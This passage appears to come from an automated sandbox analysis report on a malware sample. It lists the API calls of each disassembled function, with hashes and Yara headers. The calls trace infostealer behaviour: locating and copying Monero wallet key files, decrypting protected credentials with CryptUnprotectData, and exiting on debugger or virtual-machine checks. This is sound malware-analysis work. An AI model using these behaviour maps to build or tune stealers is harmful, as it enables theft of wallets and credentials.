                                                      • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 2284531361-0
                                                      • Opcode ID: 0a4584e588e2a1bd53d0dc5be3f63ae9425af6167d0c2907f6cf8e63ec5e0e21
                                                      • Instruction ID: 3bd768c5fca807ec490ac578a577b850f746e1cbddf07a5c3493adefd5f4a840
                                                      • Opcode Fuzzy Hash: 0a4584e588e2a1bd53d0dc5be3f63ae9425af6167d0c2907f6cf8e63ec5e0e21
                                                      • Instruction Fuzzy Hash: 7D01A2316012249BDB249B20EC89FEA77BDEF48751F0401D9F908D2040EFB48A958FF5
                                                      Function 02C98011 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 02C98879
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C9888E
                                                      • UnhandledExceptionFilter.KERNEL32(0042C298), ref: 02C98899
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 02C988B5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 02C988BC
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 2579439406-0
                                                      • Opcode ID: 81133d0f59986b58adb243c707ef71d8ad7c18327483a8e6b33276d8b1410e24
                                                      • Instruction ID: c9f9f94af2974d512c63093860eeb90d5c701b853fd4b42bad70b3a4e274b099
                                                      • Opcode Fuzzy Hash: 81133d0f59986b58adb243c707ef71d8ad7c18327483a8e6b33276d8b1410e24
                                                      • Instruction Fuzzy Hash: 9621DEB5900306DFCB60DF15F988A48BBB4FB28304F50616EF81887762EBB065858F5C
                                                      Function 00407750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00407765
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                                                      • LocalFree.KERNEL32(?), ref: 004077B7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                      • String ID:
                                                      • API String ID: 3657800372-0
                                                      • Opcode ID: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
                                                      • Instruction ID: 7fa361070e6919b9c387aeb0df070321f657dace02b2a1325b51809b71c78810
                                                      • Opcode Fuzzy Hash: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
                                                      • Instruction Fuzzy Hash: F7011275B443187BEB14DB949C4AFAA7B79EB44B15F104159FA05EB2C0D6F0A9008BE4
                                                      Function 004242C0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004242DD
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004242EC
                                                      • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004242F3
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00424323
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptHeapString$AllocProcess
                                                      • String ID:
                                                      • API String ID: 3939037734-0
                                                      • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction ID: 9713ce4537880be7ab514a821b153c94c7b12f34070f0629a2b55f5b2daa99c3
                                                      • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction Fuzzy Hash: B8015A70600215ABDB108FA5EC89BABBBADEF88311F108199BD09C7340DA7099408BA4
                                                      Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B9F
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409BB3
                                                      • memcpy.MSVCRT(00000000,?), ref: 00409BCA
                                                      • LocalFree.KERNEL32(?), ref: 00409BD7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                      • String ID:
                                                      • API String ID: 3243516280-0
                                                      • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction ID: a8d62dfbe6203375accfd57a9289b477ef975779ddea21d9cd908cb540d9be87
                                                      • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction Fuzzy Hash: 3101FB75A41309ABD7109BA4DC45BABB779EB44700F104169FA04AB381EBB4AE008BE5
                                                      Function 00409B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B3B
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B4A
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B61
                                                      • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B70
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                      • String ID:
                                                      • API String ID: 4291131564-0
                                                      • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction ID: fdb19b52b522e7fb6258fb386c859728d3eb4189d8c812c623f7d3b132898295
                                                      • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction Fuzzy Hash: 89F0BD703443126BE7305F65AC49F577BA9EF04B61F240515FA45EA2D0D7B49C40CAA4
                                                      Function 02C8CF29 Relevance: 4.6, APIs: 3, Instructions: 102comstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.COMBASE(0042B118,00000000,00000001,0042B108,?), ref: 02C8CF5D
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 02C8CF9D
                                                      • lstrcpyn.KERNEL32(?,?,00000104), ref: 02C8D020
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                                      • String ID:
                                                      • API String ID: 1940255200-0
                                                      • Opcode ID: 6b054bc3ed76e03b3c8d476564611060be1a67b8d02412b6fca3c0074aada483
                                                      • Instruction ID: 3160de827f47e2a0893a69c659da295a8327c283496104d502765f880b26e13c
                                                      • Opcode Fuzzy Hash: 6b054bc3ed76e03b3c8d476564611060be1a67b8d02412b6fca3c0074aada483
                                                      • Instruction Fuzzy Hash: EE318271A40614AFD710DB94CC81FA9B7B9DB88B15F108188FA05EB2D0D7B1AE45CBE0
                                                      Function 02C96767 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be4a19ca30413338a7960560cfbf2d2ce858cfbfdcce81e9b17ed433251d2760
                                                      • Instruction ID: d93ca8b695642c8b64c53f385afd2a1d514bdb1d2bfe4a9c5acecd660c3378c1
                                                      • Opcode Fuzzy Hash: be4a19ca30413338a7960560cfbf2d2ce858cfbfdcce81e9b17ed433251d2760
                                                      • Instruction Fuzzy Hash: C9119135B046249FCB20CF9DE8909A9B3F9FB8471871501AAD845D7751DB71EA41CB90
                                                      Function 02C99C73 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                      • Instruction ID: c4df72a5f1579038dea29de44ee5229cbed5559608dd9130deecf6c80eb9d882
                                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                      • Instruction Fuzzy Hash: C771C5B2432B049BEF633B31DD49B49F6A37F48B00F194D24A1D6217749B236869BF51
                                                      Function 02C88A1F Relevance: 66.4, APIs: 44, Instructions: 386stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(?), ref: 02C88A51
                                                        • Part of subcall function 02C944B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 02C944E4
                                                        • Part of subcall function 02C944B7: lstrcpy.KERNEL32(00000000,?), ref: 02C94519
                                                      • StrStrA.SHLWAPI(?,00638C08), ref: 02C88A76
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88A95
                                                      • lstrlen.KERNEL32(?), ref: 02C88AA8
                                                      • wsprintfA.USER32 ref: 02C88AB8
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88ACE
                                                      • StrStrA.SHLWAPI(?,00638C94), ref: 02C88AFB
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88B22
                                                      • lstrlen.KERNEL32(?), ref: 02C88B35
                                                      • wsprintfA.USER32 ref: 02C88B45
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 02C88B5B
                                                      • StrStrA.SHLWAPI(?,00638C5C), ref: 02C88B88
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88BA7
                                                      • lstrlen.KERNEL32(?), ref: 02C88BBA
                                                      • wsprintfA.USER32 ref: 02C88BCA
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88BE0
                                                      • StrStrA.SHLWAPI(?,00638ABC), ref: 02C88C0D
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88C2C
                                                      • lstrlen.KERNEL32(?), ref: 02C88C3F
                                                      • wsprintfA.USER32 ref: 02C88C4F
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88C65
                                                      • StrStrA.SHLWAPI(?,00638AD0), ref: 02C88C92
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88CB9
                                                      • lstrlen.KERNEL32(?), ref: 02C88CCC
                                                      • wsprintfA.USER32 ref: 02C88CDC
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 02C88CF2
                                                      • StrStrA.SHLWAPI(?,0063891C), ref: 02C88D1F
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88D3E
                                                      • lstrlen.KERNEL32(?), ref: 02C88D51
                                                      • wsprintfA.USER32 ref: 02C88D61
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88D77
                                                      • StrStrA.SHLWAPI(?,00638D3C), ref: 02C88DA4
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88DC3
                                                      • lstrlen.KERNEL32(?), ref: 02C88DD6
                                                      • wsprintfA.USER32 ref: 02C88DE6
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88DFC
                                                      • StrStrA.SHLWAPI(?,00638B34), ref: 02C88E29
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88E50
                                                      • lstrlen.KERNEL32(?), ref: 02C88E63
                                                      • wsprintfA.USER32 ref: 02C88E73
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 02C88E89
                                                      • lstrlen.KERNEL32(?), ref: 02C88EAE
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C88EE3
                                                      • strtok_s.MSVCRT ref: 02C89001
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcpynwsprintf$FolderPathstrtok_s
                                                      • String ID:
                                                      • API String ID: 2042561329-0
                                                      • Opcode ID: 3e5a7dd2493b5aa3f281e3d459a021438d4c520a72c8d6f6fd8dab9dff384490
                                                      • Instruction ID: 76d77bc28e9874cf0a5bf18163b93f477cb4f63567805501be51225bfdafee88
                                                      • Opcode Fuzzy Hash: 3e5a7dd2493b5aa3f281e3d459a021438d4c520a72c8d6f6fd8dab9dff384490
                                                      • Instruction Fuzzy Hash: 9FE151B1900658AFDB10DB64DD48ADA77BAEF98304F144159F909E7350DB70AE05CFA1
                                                      Function 00401190 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 004011AA
                                                        • Part of subcall function 00401120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                                                        • Part of subcall function 00401120: HeapAlloc.KERNEL32(00000000), ref: 0040113C
                                                        • Part of subcall function 00401120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                                                        • Part of subcall function 00401120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                                                        • Part of subcall function 00401120: RegCloseKey.ADVAPI32(?), ref: 0040117D
                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004011C0
                                                      • lstrlenA.KERNEL32(?), ref: 004011CD
                                                      • lstrcatA.KERNEL32(?,.keys), ref: 004011E8
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040121F
                                                      • lstrlenA.KERNEL32(02D8A840), ref: 0040122D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401251
                                                      • lstrcatA.KERNEL32(00000000,02D8A840), ref: 00401259
                                                      • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401264
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00401288
                                                      • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401294
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004012BA
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 004012FF
                                                      • lstrlenA.KERNEL32(02D8DCB0), ref: 0040130E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401335
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040133D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00401378
                                                      • lstrcatA.KERNEL32(00000000), ref: 00401385
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004013AC
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004013D5
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401401
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040143D
                                                        • Part of subcall function 0041EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0041EFF2
                                                      • DeleteFileA.KERNEL32(?), ref: 00401471
                                                      • memset.MSVCRT ref: 0040148E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                                      • String ID: .keys$\Monero\wallet.keys
                                                      • API String ID: 2734118222-3586502688
                                                      • Opcode ID: 272afd06092d23ba9ffd297ddbb04893c96f386607a5bf3016298e8a28865c6e
                                                      • Instruction ID: 107083fb19e5d757d6b5f7c97fc85a8bb09bd95212823e3c222e070f8096506b
                                                      • Opcode Fuzzy Hash: 272afd06092d23ba9ffd297ddbb04893c96f386607a5bf3016298e8a28865c6e
                                                      • Instruction Fuzzy Hash: A9A17F71B102069BCB21AB79DD89A9F77B9AF44304F04007AF905F72E1DB78DD058BA8
                                                      Function 02C85B67 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C85B9C
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02C85BCB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85BFC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85C24
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85C2F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85C57
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85C8F
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85C9A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85CBF
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C85CF5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85D1D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85D28
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85D4F
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C85D61
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85D80
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C85D8C
                                                      • lstrlen.KERNEL32(00638DD8), ref: 02C85D9B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85DBE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85DC9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85DF3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85E1F
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C85E26
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85E7E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85EF4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85F1D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85F50
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85F7C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C85FB6
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C86013
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C86037
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                                      • String ID:
                                                      • API String ID: 2428362635-0
                                                      • Opcode ID: 4c0de8b9607b3dae64bf6b53f6e62537ebce006a950589915d47254386edbdb5
                                                      • Instruction ID: dc54505c418e2d9bbb4e6f3b321298dcdaf6ad0ca43d69fe71cc488b1a44715e
                                                      • Opcode Fuzzy Hash: 4c0de8b9607b3dae64bf6b53f6e62537ebce006a950589915d47254386edbdb5
                                                      • Instruction Fuzzy Hash: 8602C3B1A016469FCB10AF74CD88AAE7BF6EF44348F558428EC05A7250DB74DE44DF91
                                                      Function 02C867D7 Relevance: 43.9, APIs: 29, Instructions: 438stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8680C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86847
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C86871
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C868A8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C868CD
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C868D5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C868FE
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$FolderPathlstrcat
                                                      • String ID:
                                                      • API String ID: 2938889746-0
                                                      • Opcode ID: 9d5917b4d61bf762f55fd1ccb37321e6179371eb6c85f701233e840c4e5d0844
                                                      • Instruction ID: a9027282ba3fd9107c0b3d192f318c4f452e01f0fc7236a9a5ec526743e53b3c
                                                      • Opcode Fuzzy Hash: 9d5917b4d61bf762f55fd1ccb37321e6179371eb6c85f701233e840c4e5d0844
                                                      • Instruction Fuzzy Hash: 1DF1C370A016069BDB21FF75CC88AAE7BBAEF4430CF14C428E855A7290DB74DA45DF91
                                                      Function 02C92027 Relevance: 43.7, APIs: 29, Instructions: 218stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02C96860
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02C96879
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 02C96891
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 02C968A9
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 02C968C2
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 02C968DA
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02C968F2
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 02C9690B
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02C96923
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 02C9693B
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02C96954
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 02C9696C
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 02C96984
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C92066
                                                      • ExitProcess.KERNEL32 ref: 02C9209E
                                                      • GetSystemInfo.KERNEL32(?), ref: 02C920A8
                                                      • ExitProcess.KERNEL32 ref: 02C920B6
                                                        • Part of subcall function 02C71297: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02C712AD
                                                        • Part of subcall function 02C71297: VirtualAllocExNuma.KERNEL32(00000000), ref: 02C712B4
                                                        • Part of subcall function 02C71297: ExitProcess.KERNEL32 ref: 02C712BF
                                                        • Part of subcall function 02C71327: GlobalMemoryStatusEx.KERNEL32 ref: 02C71351
                                                        • Part of subcall function 02C71327: ExitProcess.KERNEL32 ref: 02C7137B
                                                      • GetUserDefaultLangID.KERNEL32 ref: 02C920C6
                                                      • ExitProcess.KERNEL32 ref: 02C92118
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Process$Exit$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtuallstrcpy
                                                      • String ID:
                                                      • API String ID: 1589815927-0
                                                      • Opcode ID: 93640e03c3836f20208e9c97ebb38f71becffdefc605de61920b8a9654901af0
                                                      • Instruction ID: d465b526a867ca6e1804a45630c704f33a0a11b8b763e4baae9a3c820f49b2be
                                                      • Opcode Fuzzy Hash: 93640e03c3836f20208e9c97ebb38f71becffdefc605de61920b8a9654901af0
                                                      • Instruction Fuzzy Hash: 12717F71500616AFDB20ABB0DC8CF6E7ABBAF85705F045018FD46A71A0DB749901EFA2
